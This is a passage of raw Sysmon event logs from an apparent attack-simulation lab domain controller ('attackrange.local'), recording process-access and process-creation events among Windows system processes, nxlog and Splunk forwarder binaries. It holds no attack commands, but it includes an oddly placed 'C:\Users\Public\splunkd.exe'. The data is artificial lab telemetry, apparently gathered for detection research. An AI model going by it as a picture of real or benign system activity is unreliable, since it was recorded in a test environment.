C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4317,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:57.846\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1149-5F25-0000-001014130600}\r\nTargetProcessId: 3476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:57.846","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1149-5F25-0000-001014130600}","TargetProcessId":"3476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4318,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:58.487\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:58.487","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4319,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nProcessGuid: {E2A3D6B1-114B-5F25-0000-00100B150600}\r\nProcessId: 4856\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.175","ProcessGuid":"{E2A3D6B1-114B-5F25-0000-00100B150600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4320,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-114B-5F25-0000-00100B150600}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.175","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-114B-5F25-0000-00100B150600}","TargetProcessId":"4856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4321,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-114B-5F25-0000-00100B150600}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.175","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-114B-5F25-0000-00100B150600}","TargetProcessId":"4856","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4322,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.175","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4323,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:59.175","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4324,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:59.175\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 